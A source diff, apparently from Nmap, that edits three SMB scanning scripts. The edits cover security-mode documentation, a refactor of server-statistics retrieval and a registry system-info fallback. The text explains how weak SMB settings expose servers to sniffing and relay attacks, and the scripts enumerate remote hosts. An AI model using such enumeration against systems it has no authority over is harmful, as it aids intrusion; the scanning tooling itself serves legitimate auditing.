+++ b/scripts/smb-security-mode.nse
@@ -3,31 +3,10 @@ Returns information about the SMB security level determined by SMB.
 
 Here is how to interpret the output:
 
-* User-level authentication: Each user has a separate username/password that is used
-to log into the system. This is the default setup of pretty much everything
-these days.
-* Share-level authentication: The anonymous account should be used to log in, then 
-the password is given (in plaintext) when a share is accessed. All users who
-have access to the share use this password. This was the original way of doing
-things, but isn't commonly seen, now. If a server uses share-level security, 
-it is vulnerable to sniffing.
-* Challenge/response passwords supported: If enabled, the server can accept any 
-type of password (plaintext, LM and NTLM, and LMv2 and NTLMv2).  If it isn't set, 
-the server can only accept plaintext passwords. Most servers are configured to 
-use challenge/response these days. If a server is configured to accept plaintext 
-passwords, it is vulnerable to sniffing. LM and NTLM are fairly secure, although 
-there are some brute-force attacks against them. Additionally, LM and NTLM can 
-fall victim to man-in-the-middle attacks or relay attacks (see MS08-068 or my 
-writeup of it: http://www.skullsecurity.org/blog/?p=110). 
-* Message signing: If required, all messages between the client and server must
-be signed by a shared key, derived from the password and the server
-challenge. If supported and not required, message signing is negotiated between
-clients and servers and used if both support and request it. By default,
-Windows clients don't sign messages, so if message signing isn't required by
-the server, messages probably won't be signed; additionally, if performing a
-man-in-the-middle attack, an attacker can negotiate no message signing. If
-message signing isn't required, the server is vulnerable to man-in-the-middle
-attacks or SMB-relay attacks.
+* User-level authentication: Each user has a separate username/password that is used to log into the system. This is the default setup of pretty much everything these days.
+* Share-level authentication: The anonymous account should be used to log in, then the password is given (in plaintext) when a share is accessed. All users who have access to the share use this password. This was the original way of doing things, but isn't commonly seen, now. If a server uses share-level security, it is vulnerable to sniffing.
+* Challenge/response passwords supported: If enabled, the server can accept any type of password (plaintext, LM and NTLM, and LMv2 and NTLMv2).  If it isn't set, the server can only accept plaintext passwords. Most servers are configured to use challenge/response these days. If a server is configured to accept plaintext passwords, it is vulnerable to sniffing. LM and NTLM are fairly secure, although there are some brute-force attacks against them. Additionally, LM and NTLM can fall victim to man-in-the-middle attacks or relay attacks (see MS08-068 or my writeup of it: <http://www.skullsecurity.org/blog/?p=110>. 
+* Message signing: If required, all messages between the client and server must be signed by a shared key, derived from the password and the server challenge. If supported and not required, message signing is negotiated between clients and servers and used if both support and request it. By default, Windows clients don't sign messages, so if message signing isn't required by the server, messages probably won't be signed; additionally, if performing a man-in-the-middle attack, an attacker can negotiate no message signing. If message signing isn't required, the server is vulnerable to man-in-the-middle attacks or SMB-relay attacks.
 
 This script will allow you to use the <code>smb*</code> script arguments (to
 set the username and password, etc.), but it probably won't ever require them. 
diff --git a/scripts/smb-server-stats.nse b/scripts/smb-server-stats.nse
index e0a8586e6..7239e7078 100644
--- a/scripts/smb-server-stats.nse
+++ b/scripts/smb-server-stats.nse
@@ -3,7 +3,7 @@ Attempts to grab the server's statistics over SMB and MSRPC, which uses TCP
 ports 445 or 139. 
 
 An administrator account is required to pull these statistics on most versions
-of Windows, and Vista doesn't seem to let even the administrator account pull them.
+of Windows, and Vista and above require UAC to be turned down. 
 
 Some of the numbers returned here don't feel right to me, but they're definitely 
 the numbers that Windows returns. Take the values here with a grain of salt. 
@@ -44,65 +44,21 @@ end
 
 action = function(host)
 
-	-- Create the SMB session
-	status, smbstate = msrpc.start_smb(host, msrpc.SRVSVC_PATH)
-	if(status == false) then
-		if(nmap.debugging() > 0) then
-			return "ERROR: " .. smbstate
-		else
-			return nil
-		end
-	end
-
-	-- Bind to SRVSVC service
-	status, bind_result = msrpc.bind(smbstate, msrpc.SRVSVC_UUID, msrpc.SRVSVC_VERSION, nil)
-	if(status == false) then
-		smb.stop(smbstate)
-		if(nmap.debugging() > 0) then
-			return "ERROR: " .. bind_result
-		else
-			return nil
-		end
-	end
-
-	-- Call netservergetstatistics for 'server'
-	status, netservergetstatistics_result = msrpc.srvsvc_netservergetstatistics(smbstate, host.ip)
-	if(status == false) then
-		smb.stop(smbstate)
-		if(nmap.debugging() > 0) then
-			return "ERROR: " .. netservergetstatistics_result
-		else
-			return nil
-		end
-	end
-
-	-- Stop the session
-	smb.stop(smbstate)
-
-	-- Build the response	
-	local stats = netservergetstatistics_result['stat']
+	local result, stats
 	local response = " \n"
-	local period = os.time() - stats['start']
-	local period_str
 
-	-- Fix a couple values
-	stats['bytessent'] = bit.bor(bit.lshift(stats['bytessent_high'], 32), stats['bytessent_low'])
-	stats['bytesrcvd'] = bit.bor(bit.lshift(stats['bytesrcvd_high'], 32), stats['bytesrcvd_low'])
+	result, stats = msrpc.get_server_stats(host)
 
-	if(period == 0) then
-		period = 1
+	if(result == false) then
+		if(nmap.debugging() > 0) then
+			return "ERROR: " .. stats
+		else
+			return nil
+		end
 	end
 
-	if(period > 60 * 60 * 24) then
-		period_str = string.format("%dd%dh%02dm%02ds", period / (60*60*24), (period % (60*60*24)) / 3600, (period % 3600) / 60, period % 60)
-	elseif(period > 60 * 60) then
-		period_str = string.format("%dh%02dm%02ds", period / 3600, (period % 3600) / 60, period % 60)
-	else
-		period_str = string.format("%02dm%02ds", period / 60, period % 60)
-	end
-
-	response = response .. string.format("Server statistics collected since %s (%s):\n", os.date("%Y-%m-%d %H:%M:%S", stats['start']), period_str)
-	response = response .. string.format("|_ Traffic %d bytes (%.2f b/s) sent, %d bytes (%.2f b/s) received\n", stats['bytessent'], stats['bytessent'] / period, stats['bytesrcvd'], stats['bytesrcvd'] / period)
+	response = response .. string.format("Server statistics collected since %s (%s):\n", stats['start_str'], stats['period_str'])
+	response = response .. string.format("|_ Traffic %d bytes (%.2f b/s) sent, %d bytes (%.2f b/s) received\n", stats['bytessent'], stats['bytessentpersecond'], stats['bytesrcvd'], stats['bytesrcvdpersecond'])
 	response = response .. string.format("|_ Failed logins: %d\n", stats['pwerrors'])
 	response = response .. string.format("|_ Permission errors: %d, System errors: %d\n", stats['permerrors'], stats['syserrors'])
 	response = response .. string.format("|_ Print jobs spooled: %s\n", stats['jobsqueued'])
diff --git a/scripts/smb-system-info.nse b/scripts/smb-system-info.nse
index a95ffa46a..fdc52425b 100644
--- a/scripts/smb-system-info.nse
+++ b/scripts/smb-system-info.nse
@@ -1,20 +1,21 @@
-
 description = [[
 Pulls back information about the remote system from the registry. Getting all
 of the information requires an administrative account, although a user account
 will still get a lot of it. Guest probably won't get any, nor will anonymous. 
 This goes for all operating systems, including Windows 2000. 
 
-Windows Vista doesn't appear to have the WINREG binding (or it's different and
-I don't know it), so this doesn't support Vista at all. 
+Windows Vista disables remote registry access by default, so unless itw as enabled, 
+this script won't work.
 
 If you know of more information stored in the Windows registry that could be interesting, 
 post a message to the nmap-dev mailing list and I (Ron Bowes) will add it to my todo list. 
 Adding new checks to this is extremely easy. 
 
-WARNING: I have experienced crashes in regsvc.exe while making registry calls against a fully patched Windows 
-2000 system; I've fixed the issue that caused it, but there's no guarantee that it (or a similar vuln in the
-same code) won't show up again.
+WARNING: I have experienced crashes in regsvc.exe while making registry calls
+against a fully patched Windows 2000 system; I've fixed the issue that caused it,
+but there's no guarantee that it (or a similar vuln in the same code) won't show
+up again. Since the process automatically restarts, it doesn't negatively impact
+the system, besides showing a message box to the user.
 ]]
 
 ---
@@ -202,6 +203,10 @@ action = function(host)
 	
 			response = response .. string.format("Hardware\n")
 			for i = 0, result['number_of_processors'] - 1, 1 do
+				if(result['status-processornamestring'..i] == false) then
+					result['status-processornamestring'..i] = "Unknown"
+				end
+
 				response = response .. string.format("|_ CPU %d: %s [%dmhz %s]\n", i, result['processornamestring'..i], result['~mhz'..i], result['vendoridentifier'..i])
 				response = response .. string.format("|_ Identifier %d: %s\n",  i, result['identifier'..i])
 			end